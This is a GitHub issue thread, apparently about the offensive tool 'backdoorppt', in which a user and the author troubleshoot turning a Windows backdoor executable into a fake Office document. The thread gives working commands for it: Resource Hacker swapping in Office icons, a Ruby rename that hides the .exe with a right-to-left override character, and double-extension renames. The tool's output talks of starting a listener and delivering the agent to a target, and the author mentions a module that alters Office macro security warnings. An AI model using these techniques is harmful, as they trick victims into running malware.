Comments (24)
bug report: rename': No such file or directory
Do a check for me..
check if exist:
backdoorppt/output/backdoor.exe
or
backdoorppt/output/backdoor_ppt.exe
If the files are not present than possible causes are:
1 - you did not enter the payload.exe binary to be transformed.
in "PAYLOAD TO BE TRANSFORMED" zenity-box (full path location)
and backdoorppt tool can not find the payload.exe to be transformed..
2 - 'PAYLOAD TO BE TRANSFORMED' its not a windows binary payload.exe
If the files are present than possible causes are:
1 - The 'Ruby interpreter' version its not compatible with the ruby command
used by this tool "backdoorppt tool uses ruby 1.8.7 command syntax"
In that case: try using the 'BASH TRANSFORMATION' method insted
1º - edit 'settings' file and change the follow line:
BASH_TRANSFORMATION=NO
change it to:
BASH_TRANSFORMATION=YES
2º - save 'settings' file and run backdoorppt again
from backdoorppt.
Thanks for the reply, let me check:) brb
from backdoorppt.
not quite...
it means that your resourcehacker its not changing the payload icons...
Try to manually change the icons
replace $UpL by the full path of your payload to be transformed
wine /root/.wine/drive_c/"Program Files/"Resource Hacker"/ResourceHacker.exe -open $UpL -save /root/Desktop/Tools/backdoorppt/output/backdoor.exe -action addskip -res /root/Desktop/Tools/backdoorppt/icons/Microsoft-Excel.ico -mask ICONGROUP,MAINICON,
NOTE: settings file must be edited before runing bacdoorppt.sh rigth?
from backdoorppt.
well i have try just now the 4 diferent ways to build..
and everything works fine in my distro (kali rolling)...
it builds the 2 transformation methods (ruby or bash) using RH
and it builds the 2 transformation methods (ruby or bash) without using RH
from backdoorppt.
yea no idea.. im running kali 2. also, i will try to reinstall the GIT, maybe that will do something..
from backdoorppt.
the 2 above commands required an backdoor.exe
to be present in backdoorppt/output folder to be able to 'transform' the extensions..
in RUBY it requires:
backdoorppt/output/backdoor_ppt.exe
and then
ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")'
in BASH it requires:
/root/backdoorppt/output/backdoor.exe
and then
mv backdoorppt/output/backdoor.exe backdoorppt/output/NAME.ppt.exe > /dev/null 2>&1
from backdoorppt.
yap
from backdoorppt.
okido:)
from backdoorppt.
backdoorppt/output/ is empty..
When i run the script, it let me choose a .exe File via a Dialog.
After that, i need to choose win7 settings for Wine.
Than it gives me this:
`[⊶] Checking backend applications!
[☆] Ruby installation -> found!
[☆] Wine installation -> found!
[☆] Zenity installation-> found!
[☆] Xterm installation -> found!
[☆] Wine Program Files -> found!
[☆] Select [windows 7] from winecfg...
The ResourceHacker provided by backdoorppt tool
requires wine to be set to 'windows 7' version.
[☆] ResourceHacker.exe -> found!
[⊶] Working on backdoor agent!
[☆] Transforming backdoor agent -> done...
[☆] Change backdoor agent icons -> done...
[☆] Adding agent hidden extensions -> done...
[☆] Word doc builder (backdoorppt) -> done...
-e:1:in rename': No such file or directory @ rb_file_s_rename - (backdoor_ppt.exe, resumetpp.exe) (Errno::ENOENT) from -e:1:in
[⊶] Task over, Writing reports!
Icon select : Microsoft-Word-2016.ico
Final file : /root/Desktop/Tools/backdoorppt/output/resumeexe.ppt
Tool Author : r00t-3xp10it (SSA RedTeam)
Your backdoor agent its now transformed into one fake
word doc (ppt) remmenber that .exe extensions will not
be 'visible' under windows systems, because the system
default behavior its: NOT show hidden extensions...
We are now ready to start a handler (listener) and
deliver the transformed agent to the target machine.
from backdoorppt.
edit 'settings' file and activate the BASH_TRANSFORMATION method..
BASH_TRANSFORMATION=YES
if dosent work in means that your resourcehacker
installed is not doing is job to replace payload icons ...
in that case edit 'settings' file and activate:
RESOURCEHACKER_BYPASS=YES
from backdoorppt.
It looks like everything goes perfect, but still nothing in OUTPUT:
`root@kalix:~/Desktop/Tools/backdoorppt# ./backdoorppt.sh
+-+-+-+-+-+-+-+-+-+-+-+-+---+
|b|a|c|k|d|o|o|r|p|p|t|:|1.5|
+-+-+-+-+-+-+-+-+-+-+-+-+---+
'Office spoof extensions tool'
Credits: Damon Mohammadbagher
[⊶] Checking backend applications!
[☆] Wine installation -> found!
[☆] Zenity installation-> found!
[☆] Xterm installation -> found!
[☆] Wine Program Files -> found!
[☆] Select [windows 7] from winecfg...
The ResourceHacker provided by backdoorppt tool
requires wine to be set to 'windows 7' version.
[☆] ResourceHacker.exe -> found!
[⊶] Working on backdoor agent!
[☆] Transforming backdoor agent -> done...
[☆] Change backdoor agent icons -> done...
[☆] Adding agent hidden extensions -> done...
[☆] Word doc builder (backdoorppt) -> done...
[⊶] Task over, Writing reports!
Icon select : Powerpoint-green.ico
Final file : /root/Desktop/Tools/backdoorppt/output/testje.ppt.exe
Tool Author : r00t-3xp10it (SSA RedTeam)
Your backdoor agent its now transformed into one fake
word doc (ppt) remmenber that .exe extensions will not
be 'visible' under windows systems, because the system
default behavior its: NOT show hidden extensions...
We are now ready to start a handler (listener) and
deliver the transformed agent to the target machine.
`
from backdoorppt.
After a reboot, it seems to be working now!
from backdoorppt.
its working the 2 transformations methods now?
what are the 'settings' active in backdoorppt/settings file?
from backdoorppt.
Bypassing ResourceHacker..
from backdoorppt.
i got the .ppt.exe now in OUTPUT
from backdoorppt.
So that did the trick right?
from backdoorppt.
yea ofcourse.. But still nothing:)
from backdoorppt.
any idea why i also dont get to choose the extension choise anymore? (doc, excl, etc)
from backdoorppt.
btw.. is this the only "office spoof" tool u got? respect for this one afcorse!
But i was reading about a sillent doc exploit? Even not macro, u got any info about it?
from backdoorppt.
ahhh you have some issue in your file system...
because backdoorppt.sh only uses backdoorexe.ppt or backdoor.ppt.exe extension methods
backdoorppt.sh uses the follow command to embedded extensions (ruby method)
1 - mv ~/backdoorppt/output/backdoor.exe ~/backdoorppt/output/backdoor_ppt.exe > /dev/null 2>&1
2 - ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")'
Those two commands will not interfer in linux file system in any way...
about sillent doc exploit i have writen a post-exploitation msf module
to change macro sandbox warning dialog read it here:
from backdoorppt.
okido let me check:) Thanks man
from backdoorppt.
root@kalix:~/Desktop/Tools/backdoorppt/output# ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")' -e:1:in
rename': No such file or directory @ rb_file_s_rename - (backdoor_ppt.exe, resumetpp.exe) (Errno::ENOENT)
from -e:1:in <main>'
from backdoorppt.
ohh okay so choose the "backdoor" manual by placing it in the output folder
from backdoorppt.
Issue resolved .. resource hacker its working under wine 64 bits now ..
from backdoorppt.
Related Issues (13)
- Infinite Loop HOT 42
- Not executing :( Here is the issue. HOT 1
- Resource Hacker HOT 1
- {zenity} [x] Aborting all tasks : done! HOT 1
- Does it opens a .PPT on the same time or not? HOT 1
- excellent tool , Thanks man ;) well done
- hasn't copied the file. HOT 5
- freezing the computer after running HOT 7
- Directory Path issue HOT 1
- Sorry for post it here
- debian too ? HOT 3
- please could provide some examples HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from backdoorppt.